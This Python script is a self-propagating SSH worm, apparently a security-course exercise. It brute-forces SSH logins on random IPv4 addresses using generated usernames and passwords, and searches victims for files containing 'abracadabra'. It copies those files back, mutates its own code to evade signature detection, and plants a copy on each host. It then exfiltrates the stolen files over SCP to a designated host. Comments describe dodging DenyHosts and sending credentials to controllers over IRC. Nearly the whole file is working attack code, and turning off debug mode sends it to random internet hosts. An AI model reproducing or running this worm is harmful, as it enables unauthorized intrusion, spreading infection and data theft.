#!/usr/bin/env python

import sys
import os
import random
import paramiko
import scp
import select
import signal
import re

def sig_handler(signum,frame): os.kill(os.getpid(),signal.SIGKILL)
signal.signal(signal.SIGINT, sig_handler)

debug = 1      # IMPORTANT:  Before changing this setting, read the last
               #             paragraph of the main comment block above. As
               #             mentioned there, you need to provide two IP
               #             addresses in order to run this code in debug 
               #             mode. 
NHOSTS = NUSERNAMES = NPASSWDS = 3


##  The trigrams and digrams are used for syntheizing plausible looking
##  usernames and passwords.  See the subroutines at the end of this script
##  for how usernames and passwords are generated by the worm.
trigrams = '''bad bag bal bak bam ban bap bar bas bat bed beg ben bet beu bum 
                  bus but buz cam cat ced cel cin cid cip cir con cod cos cop 
                  cub cut cud cun dak dan doc dog dom dop dor dot dov dow fab 
                  faq fat for fuk gab jab jad jam jap jad jas jew koo kee kil 
                  kim kin kip kir kis kit kix laf lad laf lag led leg lem len 
                  let nab nac nad nag nal nam nan nap nar nas nat oda ode odi 
                  odo ogo oho ojo oko omo out paa pab pac pad paf pag paj pak 
                  pal pam pap par pas pat pek pem pet qik rab rob rik rom sab 
                  sad sag sak sam sap sas sat sit sid sic six tab tad tom tod 
                  wad was wot xin zap zuk'''

digrams = '''al an ar as at ba bo cu da de do ed ea en er es et go gu ha hi 
              ho hu in is it le of on ou or ra re ti to te sa se si ve ur'''

trigrams = trigrams.split()
digrams  = digrams.split()

def get_new_usernames(how_many):
    if debug: return ['root']      # need a working username for debugging
    if how_many == 0: return 0
    selector = "{0:03b}".format(random.randint(0,7))
    usernames = [''.join(map(lambda x: random.sample(trigrams,1)[0] 
          if int(selector[x]) == 1 else random.sample(digrams,1)[0], range(3))) for x in range(how_many)]
    return usernames

def get_new_passwds(how_many):
    if debug: return ['mypassword']      # need a working username for debugging
    if how_many == 0: return 0
    selector = "{0:03b}".format(random.randint(0,7))
    passwds = [ ''.join(map(lambda x:  random.sample(trigrams,1)[0] + (str(random.randint(0,9)) 
                if random.random() > 0.5 else '') if int(selector[x]) == 1 
                        else random.sample(digrams,1)[0], range(3))) for x in range(how_many)]
    return passwds

def get_fresh_ipaddresses(how_many):
    if debug: return [f'172.17.0.{ip}' for ip in range(2, 3, 1)]
                    # Provide one or more IP address that you
                    # want `attacked' for debugging purposes.
                    # The usrname and password you provided
                    # in the previous two functions must
                    # work on these hosts.
    if how_many == 0: return 0
    ipaddresses = []
    for i in range(how_many):
        first,second,third,fourth = map(lambda x: str(1 + random.randint(0,x)), [223,223,223,223])
        ipaddresses.append( first + '.' + second + '.' + third + '.' + fourth )
    return ipaddresses 

def mutate_code(code):
    # Insert some extra newline characters between a randomly chosen set of lines
    for _ in range(random.randint(1, 3)):
        index = random.randint(0, len(code) - 1)
        code.insert(index, '\n')

    # Insert some extra random characters in comment blocks
    for i in range(len(code)):
        if code[i].strip().startswith('#'):
            code[i] = code[i].rstrip() + ' ' + ''.join(random.choices(trigrams, k=random.randint(1, 3))) + '\n'

    # Add some extra whitespace between the identifiers in each statement.
    pattern = r'([a-zA-Z]+(\w)+)'
    for i in range(len(code)):
        match = re.search(pattern, code[i])
        if not match:
            continue
        start = match.start()
        end = match.end()
        # apply the substitution from start+1 to end, to maintain proper indentation
        code[i] = code[i][:start+1] + re.sub(pattern, r'\1' + ' ' * random.randint(0, 3), code[i][start+1:end]) + code[i][end:]

    # Insert some extra code without modifying the overall logic
    extra_code = [
        'for _ in range(1):\n    pass\n',  # useless loop
        'if True:\n    pass\nelse:\n    pass\n',  # useless if-else block
        'try:\n    pass\nexcept:\n    pass\n',  # useless try-except block
    ]
    for i in range(len(code)):
        if re.match(r'^\w', code[i]):
            if random.random() < 0.5:
                continue
            tmp = code[i]
            code[i] = extra_code[random.randint(0, len(extra_code) - 1)] + tmp

    return code

def write_itself_to_target(scpcon, ip_address):
    id = ip_address.split('.')[-1]
    with open (__file__, 'r') as f:
        code = f.readlines()
    code = mutate_code(code)
    if not os.path.exists('task3'):
        os.mkdir('task3')
    with open (f'task3/AbraWorm_{id}.py', 'w') as f:
        f.writelines(code)
    scpcon.put(f'task3/AbraWorm_{id}.py', 'AbraWormPlus.py')
    os.remove(f'task3/AbraWorm_{id}.py')
    


# For the same IP address, we do not want to loop through multiple user 
# names and passwords consecutively since we do not want to be quarantined 
# by a tool like DenyHosts at the other end.  So let's reverse the order 
# of looping.
while True:
    usernames = get_new_usernames(NUSERNAMES)
    passwds =   get_new_passwds(NPASSWDS)
#    print("usernames: %s" % str(usernames))
#    print("passwords: %s" % str(passwds))
    # First loop over passwords
    for passwd in passwds:
        # Then loop over user names
        for user in usernames:
            # And, finally, loop over randomly chosen IP addresses
            for ip_address in get_fresh_ipaddresses(NHOSTS):
                print("\nTrying password %s for user %s at IP address: %s" % (passwd,user,ip_address))
                files_of_interest_at_target = []
                try:
                    ssh = paramiko.SSHClient()
                    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
                    ssh.connect(ip_address,port=22,username=user,password=passwd,timeout=5)
                    print(f"connected to: {ip_address}\n")
                    # Let's make sure that the target host was not previously 
                    # infected:
                    received_list = error = None
                    stdin, stdout, stderr = ssh.exec_command('ls')
                    error = stderr.readlines()
                    if error: 
                        print(error)
                    received_list = list(map(lambda x: x.encode('utf-8'), stdout.readlines()))
                    print("output of 'ls' command: %s" % str(received_list))
                    # if ''.join(received_list).find('AbraWorm') >= 0: 
                    #     print("\nThe target machine is already infected\n")      
                    #     continue
                    # Now let's look for files that contain the string 'abracadabra'
                    cmd = 'grep -rls abracadabra *'
                    stdin, stdout, stderr = ssh.exec_command(cmd)
                    error = stderr.readlines()
                    if error: 
                        print(error)
                        continue
                    received_list = list(map(lambda x: x.encode('utf-8'), stdout.readlines()))
                    for item in received_list:
                        files_of_interest_at_target.append(item.decode('utf-8').strip())
                    print("\nfiles of interest at the target: %s" % str(files_of_interest_at_target))
                    scpcon = scp.SCPClient(ssh.get_transport())
                    
                    if len(files_of_interest_at_target) > 0:
                        for target_file in files_of_interest_at_target:
                            local_dir = os.path.dirname(target_file)
                            if local_dir == '':
                                local_dir = '.'
                            os.makedirs(local_dir, exist_ok=True)
                            scpcon.get(target_file, local_path=target_file)
                    # Now deposit a copy of AbraWorm.py at the target host:
                    write_itself_to_target(scpcon, ip_address) 
                    print(f"copied to: {ip_address}\n")
                    scpcon.close()
                except Exception as e:
                    print(e)
                    continue
                # Now upload the exfiltrated files to a specially designated host,
                # which can be a previously infected host.  The worm will only 
                # use those previously infected hosts as destinations for 
                # exfiltrated files if it was able to send the login credentials
                # used on those hosts to its human masters through, say, a 
                # secret IRC channel. (See Lecture 29 on IRC)
                if len(files_of_interest_at_target) > 0:
                    print("\nWill now try to exfiltrate the files")
                    try:
                        ssh = paramiko.SSHClient()
                        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
                        #  For exfiltration demo to work, you must provide an IP address and the login 
                        #  credentials in the next statement:
                        ssh.connect('172.17.0.11',port=22,username='root',password='mypassword',timeout=5)
                        scpcon = scp.SCPClient(ssh.get_transport())
                        print("\n\nconnected to exhiltration host\n")
                        for filename in files_of_interest_at_target:
                            # Create remote directory hierarchy
                            remote_dir = os.path.dirname(filename)
                            if remote_dir == '':
                                remote_dir = '.'
                            stdin, stdout, stderr = ssh.exec_command(f"mkdir -p {remote_dir}")
                            stdout.channel.recv_exit_status()  # Wait for mkdir command to finish
                            scpcon.put(filename, remote_path=filename)
                        scpcon.close()
                    except: 
                        print("No uploading of exfiltrated files\n")
                        continue
    if debug: break
